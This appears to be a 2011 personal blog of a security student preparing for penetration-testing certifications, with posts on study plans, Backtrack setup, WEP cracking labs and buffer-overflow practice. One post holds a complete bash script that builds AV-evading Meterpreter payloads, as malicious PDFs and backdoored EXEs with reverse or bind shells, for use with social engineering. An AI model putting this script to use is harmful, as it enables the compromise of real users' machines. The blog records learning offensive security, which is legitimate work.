Wednesday, October 5, 2011

Batter Up! CCNA

I am now working on my CCNA.  This is 4 years in the making.  I should have had this in 2006 but I stopped for work.  Instead, I worked on getting my RHCT.  I do not regret it since it helped a lot with Linux education.  I have a firm grasp of Red Hat AS and CentOS because of it.  But it is 2011, I need to get this done.  I am definitely doing self study since I know I am not paying 3000 dollars for a classroom and I know my company is not paying for it.  Something that held me up was the $500 or so that is needed for the equipment but I am going to use GNS3.  It is an emulator which can map out an entire environment full of routers and switches.  For further research, go to the site, http://www.gns3.net/.  Warning: you will need to have the Cisco IOS images already in your possession in order for you to use it.  I am sure people can find a way to get that.  I mean it is for your education.

I also bought the book, Cisco Certified Network Associate Study Guide, Sixth Edition, by Todd Lammle.  I also bought a book in 2008, Network Warrior, by Gary Donahue.  I remember liking the book very much but it was unfortunate that I did not have enough hardware.  I want to read both books with the virtual environment I create.  I know I will still have to buy the hardware but I do not think it is necessary for this exam.  I know I will need it to do the CCNP which I do not mind.  I actually want to do that.  I will even buy a rack for it, I am sure.

This is the next step on my journey to become a great pen-tester and some day, a leader/CEO of a security firm.  The industry is changing.  It is becoming more and more perilous to ignore the dangers of technology.  I would love to be one of the good guys researching solutions to problems and using technology to warn people of the vulnerabilities of their home and organization. 

Anyway, enough dreaming, I am currently going through the commands since I have been through subnetting already.  I will try to keep my blog posts up during this process but no promises.  I want to get this done before December since the OSCE is calling me.  I still fuzz random software.  I want to some day work on 0-days too.  Have to start somewhere. I hope to follow this blueprint but maybe not to the letter: http://infiltrated.net/pentesting101.html.

OSWP Final

Well, I have finally taken the exam for the Offensive Security Wireless Professional.  It was definitely an eye opener.  I understand why so many people say it is outdated, but if you look at the SSIDs of your neighborhood, you will see quite a few WEP authenticated/encrypted networks.  Anyway, before I took the exam, I practiced a lot from the labs till I got to the point I could identify what was needed without looking at anything.  In addition, my co-worker even gave me a network to try to crack: an ad-hoc network.  I could not seem to inject into the network but I could sniff the network long enough to crack it.  I could not even de-authenticate the clients of the ad-hoc network.  However, it was fun to try every option to crack it.

I cannot talk much about the exam but I can tell you that if you can do everything in the course, you can pass the exam in the 4 hours that they give you.  I stumbled on one section but eventually got it.  After you pass the exam, they give you the option to get access to their OSWP forum which is pretty cool.  It is the same access that you get when you pass the OSCP.  Overall, I love the course.  I do wish they had more on WPA2 (psk/enterprise) networks, rainbow tables, cowpatty, GPS options, bluetooth and access points attacks.  I did read that they are working on an update to the course.  I will give that a look in the future especially if it offers cracks for bluetooth.  For now, I would suggest this course to anyone who wants the fundamentals of wireless cracking.  You can always expand your knowledge with further research.  They even give you the links for it. 

Monday, September 26, 2011

OSWP Part 2

I have almost completed the OSWP course.  I have been watching videos, taking notes and practicing the exploits.  I did hit a snag, however, with my Linksys access point.  Apparently, there is an issue with the shared key authentication of WEP encryption.  You cannot create an XOR file when you are running airodump-ng and executing a de-authentication of a currently associated client using aireplay-ng.  You get a message of "Broken SKA".  It is very frustrating since I assumed it was my version of Backtrack or possibly my drivers for my ALFA (AWUS036H).  However, I found numerous links about the problem:

http://www.chris-mohan.com/2010/03/wifu-aireplay-ng-ska-attack-problem-with-linksys-wap54g/
http://trac.aircrack-ng.org/ticket/372
http://trac.aircrack-ng.org/ticket/703
http://www.backtrack-linux.org/forums/backtrack-5-experts-section/44327-wifi-ap-wrt45gl-linksys-cisco-broken-ska.html

http://forum.aircrack-ng.org/index.php?PHPSESSID=dd18de1ba952d186cf749d7760f2643e&topic=233;prev_next=next


Of course, cracking WEP by bypassing SKA was one of the last steps of the course.  However, I have another access point that I could use: Dlink-655.  I set up the new access point with the same ESSID and the same VICTIM, I mean client.  This time I was successful.  As soon as I de-authenticated the client, the XOR file was created.  I could then use the file to execute a fake authentication with the wireless network.  The file was created instantly too.  There must be some bug with either airodump-ng or Linksys.  Possibly, it could be a combination that could be producing this weird behavior.
Anyway, the only thing left in the lab is cracking WPA networks with the dictionary/custom wordlists.  That should be fine.  I also want to use a collaboration of cewl, crunch and the wordlists from Backtrack 5 R1 to use in the field.  I wonder what kind of results I would get during a security assessment.   


Before I forget, if people are having trouble using profile variables to make the commands shorter, I used the ".bashrc" file.  The /etc/profile was not working for me like the videos illustrated.  I just figured it was my fault since I am using Backtrack 5 R1.  Fortunately, I was able to use the variable $ESSID by adding to the file ".bashrc", for example:
export ESSID=oswpexam

Friday, August 26, 2011

Bash Scripts

I have been practicing more metasploit and bash scripting.  I came up with a quick script for client side exploits.  It is not mind blowing or anything, but it is nice for a quick file with SE. It encodes enough to get past most AV and will start the multi handler to accept incoming/outgoing connections.  I am sure to add to it later but this is just a starting point.  Have to start somewhere....



#!/bin/bash

# This will create a "special" payload for you. Helps when you want to create Meterpreter files fast....
# Runs under bash (not /bin/sh) because of the [ ] string tests below; every user-supplied
# value is quoted so an empty answer does not break the test with a syntax error.

echo "Do you need a pdf or exe 'special' payload?"
read special

if [ "$special" = "pdf" ]; then
    # PDF payload built with the adobe_libtiff file-format module
    echo "What is the pdf payload, bind_tcp or reverse_tcp?"
    read Payload
    echo "Remember: This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3."
    if [ "$Payload" = "bind_tcp" ]; then
        echo "What is the rhost IP address?"
        read rhostip
        echo "What is the port we will bind to?"
        read Port
        ls /root/pdf_metasploit/
        echo "What name do you want to use for the PDF?"
        read pdf_file
        msfcli exploit/windows/fileformat/adobe_libtiff FILENAME="/root/pdf_metasploit/$pdf_file" PAYLOAD=windows/meterpreter/bind_tcp LPORT="$Port" RHOST="$rhostip" E
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT="$Port" RHOST="$rhostip" E
    elif [ "$Payload" = "reverse_tcp" ]; then
        echo "What is the lhost IP address?"
        read lhostip
        echo "What is the port we will bind to?"
        read Port
        ls /root/pdf_metasploit/
        echo "What name do you want to use for the PDF?"
        read pdf_file
        msfcli exploit/windows/fileformat/adobe_libtiff FILENAME="/root/pdf_metasploit/$pdf_file" PAYLOAD=windows/meterpreter/reverse_tcp LPORT="$Port" LHOST="$lhostip" E
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT="$Port" LHOST="$lhostip" E
    else
        echo "Did not recognize your response. Please run script again."
    fi

elif [ "$special" = "exe" ]; then
    # EXE payload injected into a template executable with msfvenom; the only difference
    # between the two branches below is the -k switch (keep template running, payload in a separate thread)
    echo "Do you want the file to execute the payload in a separate process? Yes or No?"
    read answer
    if [ "$answer" = "Yes" ] || [ "$answer" = "yes" ]; then
        echo "What is the exe payload, bind_tcp or reverse_tcp?"
        read Payload
        if [ "$Payload" = "bind_tcp" ]; then
            echo "What is the rhost IP address?"
            read rhostip
            echo "What is the port we will bind to?"
            read Port
            ls /root/exe_template/
            echo "Which exe template do you want to use?"
            read exefile
            msfvenom -p windows/meterpreter/bind_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' -i 18 LPORT="$Port" -k -x "/root/exe_template/$exefile" > /root/Desktop/bind.exe
            msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT="$Port" RHOST="$rhostip" E
        elif [ "$Payload" = "reverse_tcp" ]; then
            echo "What is the lhost IP address?"
            read lhostip
            echo "What is the port we will connect to?"
            read Port
            ls /root/exe_template/
            echo "Which exe template do you want to use?"
            read exefile
            msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' LHOST="$lhostip" LPORT="$Port" -i 18 -k -x "/root/exe_template/$exefile" > /root/Desktop/reverse.exe
            msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT="$Port" LHOST="$lhostip" E
        else
            echo "Did not recognize your response. Please run script again."
        fi

    elif [ "$answer" = "No" ] || [ "$answer" = "no" ]; then
        echo "What is the exe payload, bind_tcp or reverse_tcp?"
        read Payload
        if [ "$Payload" = "bind_tcp" ]; then
            echo "What is the rhost IP address?"
            read rhostip
            echo "What is the port we will bind to?"
            read Port
            ls /root/exe_template/
            echo "Which exe template do you want to use?"
            read exefile
            msfvenom -p windows/meterpreter/bind_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' -i 18 LPORT="$Port" -x "/root/exe_template/$exefile" > /root/Desktop/bind.exe
            msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT="$Port" RHOST="$rhostip" E
        elif [ "$Payload" = "reverse_tcp" ]; then
            echo "What is the lhost IP address?"
            read lhostip
            echo "What is the port we will connect to?"
            read Port
            ls /root/exe_template/
            echo "Which exe template do you want to use?"
            read exefile
            msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' LHOST="$lhostip" LPORT="$Port" -i 18 -x "/root/exe_template/$exefile" > /root/Desktop/reverse.exe
            msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT="$Port" LHOST="$lhostip" E
        else
            echo "Did not recognize your response. Please run script again."
        fi
    else
        echo "Did not recognize your response. Please run script again."
    fi

else
    echo "Did not recognize your response. Please run script again."
fi

Monday, August 22, 2011

Backtrack 5 R1

Finished installing Backtrack 5 R1 on the laptop on the SSD drive.  Just to note, I tried.  I tried to use KDE once more and I just cannot do it.  Basket note pads is enough to make anyone who has used it switch but it just wasn't enough.  The GUI just seems cleaner and less of a headache to use.  I am the first person to try to do something the hard way.  Trust me, ask anyone, but it just did not make any sense to me.  It should be more intuitive to use KDE and it just isn't.  I am not in the GUI all the time but when I am, it should be an easy experience.  Why else even use the GUI in the first place?

Anyway, enough of that.  It was great that they did an update to Backtrack 5 since the DNS plugin bug was a bit of a problem.  I found out later that it was only for the x64 bit versions.  That is what I get for rushing to x64 bit.  Also, it is the reason that I simply did not do the "apt-get update && apt-get upgrade && apt-get dist-upgrade".  I installed R1 pretty quickly since they have made the grub installation seamless.  It always finds my Windows installation and configures the dual-boot perfectly.  Definitely a big plus.  On to the Nvidia drivers, which were easy enough once you can keep the nouveau drivers from loading.  I used the site: "https://wiki.ubuntu.com/X/Troubleshooting/Nouveau".  I was able to CTRL+ALT+BACKSPACE and run the executable.  Sidenote, I love how easy that is to configure in Gnome: System -> Preferences -> Keyboard -> Layouts -> Options -> Key Sequence to kill the X server.  Wonderful.  Shout-out to Muts.  I like to add compiz, what can I say.  I cannot help it.  It adds an even bigger cool factor.

Next, I added the usual addons for Firefox after I upgraded it.  Added Chrome and tsclient.  I updated wireshark to 1.7.0 and updated metasploit 4.0 (the usual command svn up).  However, wireshark was a little more complicated.  I found the page "samiux.blogspot.com/2011_07_01_archive.html".  It was very helpful in the install.  Next, I installed VMware Workstation 7 on R1.  Of course, it did not work with the updated kernel on R1.  Luckily, I found the site: "weltall.heliohost.org/wordpress/2011/05/14/running-vmware-workstation-player-on-linux-2-6-39-updated/".  I was able to get VMware running in 2 seconds.  Sweet.  I know I will need that during the OSCE course.  Next, test it with the Alfa wireless adapter.  No problem there.  Next, remove the splash screen during boot-up.  Sometimes, you do not want everyone seeing a big red screen saying Backtrack 5.  Opening up VIM and editing grub.cfg took care of that.

It has been a great install on the laptop.  I am sure I will add more to this post later but I just had to say how good Backtrack 5 R1 has been.  Every Linux install has its hiccups but the finished product is what counts.  This is a pretty good end product when you think of what it is supposed to be used for.  It is not OS X or Windows so you will not hear me complain.  Just saying.

Thursday, August 11, 2011

Offensive Security Wireless Professional: OSWP (Post 1)

I am not posting as much as I want on this blog, but I am still giving it a shot.  I just want to recap the past few weeks: I have been preparing for the OSCE course by using exploits in Exploit-DB and re-writing them, from fuzzing to new python scripts to a shell prompt.  It has been a fun time.  I was able to install VMware Workstation 7 on BackTrack 5 x64 Gnome.  I have two virtual machines to work on buffer overflows, Windows XP SP2 and SP3.  I also have my desktop that has more virtual machines.  That will be essential for the OSCE course I am sure.

I have also been increasing my reading.  I have been reading "Ghost in the Wires", "Fuzzing", "Shellcoder's Handbook", "Metasploit: Penetration Tester's Guide" and "KingPin".  All of these books are great reads.  I have not finished "Ghost in the Wires" yet but it definitely has my attention.  Kevin Mitnick, Dave Kennedy, HD Moore and Joe McCray are probably my favorite pentesters/hackers. 

In addition, I have started another Offensive Security course: OSWP!!  I ordered the wireless adapter, ALFA AWUS036H.  I have heard good things about the adapter from the EthicalHacker.Net forum.  On the BackTrack 5 forum, there are instructions on loading the Realtek drivers for packet injection.  I am so excited.  Also, I have a Linksys WRT54G wireless access point.  I have registered for the class but I will be paying for it tomorrow.  Hopefully, I can get the PDFs and videos over the weekend.  I will be posting reviews of the modules and the exam as I go.  Nothing too detailed of course ;-).  When I took the OSCP course, I had a great time learning and I do not expect any less from this course.  At least, this time, the exam is only 4 hours. :-).  I have been reading www.aircrack-ng.org for a while now, but never really tried out cracking WEP or WPA.  I foresee a lot of that from now on.  People still use WEP and weak preshared keys for WPA/WPA2.  This will increase my ability to choose a different attack vector during a penetration test.


Thursday, July 7, 2011

More Buffer Overflows

It has been over a month since my last post.  It has been a really busy time.  When they say the most important resource is time, they are not kidding.  Anyway, in that time I have continued to go to exploitdb to practice.  I was able to get some basic stack overflows going on two software ftp programs, easyftp and war-ftpd.  I have been using a test OS of Windows XP SP3.  Most of the exploits seem to center around Win XP SP2.  It would be better to try different service packs I guess.  Next, I want to find more SEH exploits.  This was fun trying to figure out how to jump around in the stack.  Again, go to http://www.corelan.be/ for information about buffer overflows and infosec in general.  Great stuff.  With easyftp, I was only able to fit the "net user add" payload.  Mannnn, it was a small buffer space.  However, in war-ftpd, the buffer was much larger and I was able to fit a Windows reverse shell.  I have to say, reverse shell is the best.  Just a side note, I have noticed that I have had a lot of success when the payload is encoded in "ShikataGaNai".  It might help someone else so I figured I would mention it.

Just in case you thought I let it go: nope.  Paper is still on.  Of course, the new hacker groups that have come out have made this an excellent paper to write.  ;-) I mean I thought of this before two groups even came out in the media.  Not that they were not there the whole time.  I just need more time to get the thoughts together and more anecdotal evidence to make it more credible.  With everything that is going on, I should probably just post it by the end of the year so I can get all the probable hacks that will come recorded.

Monday, May 30, 2011

Buffer Overflows

It has been a while since I posted anything.  It has been a busy time.  I have been able to sneak in some time to work on my OffSec skills.  Hey, I am working on it.  Anyway, to prepare for the OSCE course, I am looking through the 'www.exploit-db.com' site and trying to re-exploit applications that are available using python.  I like python a lot and am trying to get better at it currently, so it looked like the obvious choice.  I am running into some confusion on the Savant 3.1 Web Server.  I understand that when exploiting SEH, we are looking for a POP, POP, return.  I understand that when you have a stack exploit, you look for a JMP into a CPU register.  But somehow, I am getting lost on the POP, RET.  Is it just the same logic behind SEH?  Are we just popping the last entry in the stack and putting the last memory entry in EIP?  I have reviewed the exploit code from "http://www.exploit-db.com/exploits/10434/".  Also, there is a great tutorial for EggHunters and Buffer Overflows at "http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html".  Just a side note, this blog has helped me in the past understand SEH exploits along with the site "https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/".  That site is incredible too.  If you want to know about buffer overflows, these are the sites to go to.  Anyway, I am kind of stuck right now, but the irony is that the person who found the vulnerability in Savant is Muts, teacher and founder of OffSec and of the OSCP and OSCE courses.  I know I have a lot of learning in store for me with the OSCE.  Hopefully, I can get some more headway with this.  On a more depressing note, I am sure I cannot afford any big CONs this year like I planned if I want to get the OSCE course and move by next year.  But the good news, I am sure there will be great CONs then too.

Wednesday, May 18, 2011

Education: 2011

I have been gathering, watching and reading more and more info-sec data from everywhere, including great books, from Amazon of course, and it has been helping a lot.  I just wanted to mention some of the things I have been using to learn, just in case you are starting out like me.  Most of the information has been leaning towards social engineering and browser exploits.  For example, if you start looking at enough YouTube clips of DefCons and presentations by the elite security researchers and pentesters, you learn that nowadays, most attacks are done on layer 7 and 8 of the OSI model.  The recent Playstation PSN hack was reported to have started from a Spear Phishing attack.  It seems that a little social engineering goes a long way.  All it takes is one click.  Depending on the vulnerability, it might even be easier.  With SQLi and XSS, you can move the browser for your victim to introduce an exploit.  A user is directed to the wrong page or opens the wrong email.  It can happen and it obviously does.  Ask Sony.  Here is my list:

Books:
Dissecting the Hack: The Forb1dd3n Network (Half way done)
Python Network Programming (Just beginning)
Social Engineering: The Art of Human Hacking (Just bought)
KingPin (Just bought)
Fuzzing: Brute Force Vulnerability Discovery (Just bought)
The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws (Just beginning)

Videos:
Elearning Security
Malware Analysis - http://youtu.be/fqf5LfPwmm4
Malware Analysis - http://youtu.be/jake9ibMIpc

Joe McCray
PenTesting - http://www.youtube.com/watch?v=tJsNu0VRKYY
Advanced SQL Injection - http://www.youtube.com/watch?v=rdyQoUNeXSg
Advanced SQL Injection (LayerOne 2009) http://www.youtube.com/watch?v=WkHkryIoLD0

Sam Kamkar
Hacking Facebook/PHP - http://www.youtube.com/watch?v=fEmO7wQKCMw&feature=related

IronGeek (Adrian Crenshaw)
Numerous Videos - http://www.irongeek.com/i.php?page=security/hackingillustrated
Dakykilla, Purehate and Irongeek
Password Exploitation Class - http://www.irongeek.com/i.php?page=videos/password-exploitation-class

SecurityTube
Numerous Videos - http://www.securitytube.net/

Python Programming
Computer Science Class - http://www.cse.msu.edu/~cse231/PracticeOfComputingUsingPython/index.php
Member of EthicalHacker.net
PenTesting Steps  - http://www.infiltrated.net/pentesting101.html


EthicalHacker
Great Forum w/ videos,links,articles for Pentesting - http://ethicalhacker.net

Hopefully, this helps other people in the quest for knowledge.  Good Night

Monday, May 16, 2011

Education: 2011

I just wanted to make a quick post about my studies for this year.  I plan on taking a few courses and certification exams this year, like any other year really.  I have been slowly preparing to be a better security and IT professional for my company and for myself.  There is a lot of great information out there to learn if anyone is willing to put in the time and energy.  Anyway, so far, I have taken two exams already.  The first, OSCP, was very exciting, informative, fun and difficult.  I will include a review about it in a later post, which it definitely deserves.  The next exam was the CASP exam which is targeted to be the next "level" from the Security+ exam.  It was a free beta exam so I figured why not.  It was a little difficult since it hit on topics I have not researched before.  It still just seems like a waste of time compared to an exam like the OSCP which is more hands-on.

The remaining two exams for this year are the OSCE and CCNA.  The OSCE is the next course of the OffSec group after the OSCP.  I must say, I am dying to take this course.  I know it can take me to that next stage of offensive security such as evading anti-virus, attacking web applications, buffer overflows with staged exploits and writing in assembly language.  It will be a painfully exciting time I am sure.  Finally, I will take the CCNA exam.  I have put this off for years now.  I just want to get it out of the way to be honest.  I am just having a hard time getting my hands on either the Cisco IOS images or the Cisco hardware.  The hardware would cost more than the exam.  I tried to go the cheaper route by using the Cisco emulator GNS3.  Of course, you need to be able to get a copy of the IOS.  FAIL.  I do not have access to the IOS images yet.  Legally anyway.  I will end up just buying the hardware.  If you see late night flashes of light and power surges going in your neighborhood, it is probably because I live near you.  I have seen some good deals on ebay and ciscokits.com.  Oh, before I forget, I am also practicing programming in python.  It seems to be great when you want to do network programming.  I am just using homework assignments from computer science courses on the Internet to practice.  It seems to be working.  I will post as I go along.  Good Night...


OSCP: Offensive Security Certified Professional
OSCE: Offensive Security Certified Expert
CCNA: Cisco Certified Network Associate
CASP: CompTIA Advanced Security Practitioner
OSWP: Offensive Security Wireless Professional
GPEN: GIAC Certified Penetration Tester

Saturday, May 14, 2011

Agoonie's first post

This is my first post.  Of course, in my first post, I have to describe my first project.  I was having a discussion about security and a friend of mine asserted something interesting.  The first assertion was that "hacking" or cyber crime, statistically, rarely happens and secondly, that when it does, it does not have a major effect on people, particularly the victims.  I have to argue those opinions.  I figured that it would be a good idea to write a paper about it and post it on my blog.  Why not?  So I shall be writing the paper on my computer and put it on one of my blog posts in the future.  Oh, yeah, hello everyone.